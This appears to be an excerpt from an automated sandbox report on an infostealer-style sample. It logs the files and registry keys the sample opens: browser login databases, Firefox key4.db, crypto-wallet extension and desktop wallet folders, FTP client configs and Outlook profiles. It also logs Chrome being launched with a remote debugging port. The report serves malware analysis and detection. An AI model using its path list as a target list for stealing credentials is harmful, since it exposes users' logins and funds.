Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\Documents\JKECGDBFCB.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 5080, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: Process Memory Space: 0d957dbf73.exe PID: 6256, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 815f2a8fe8.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR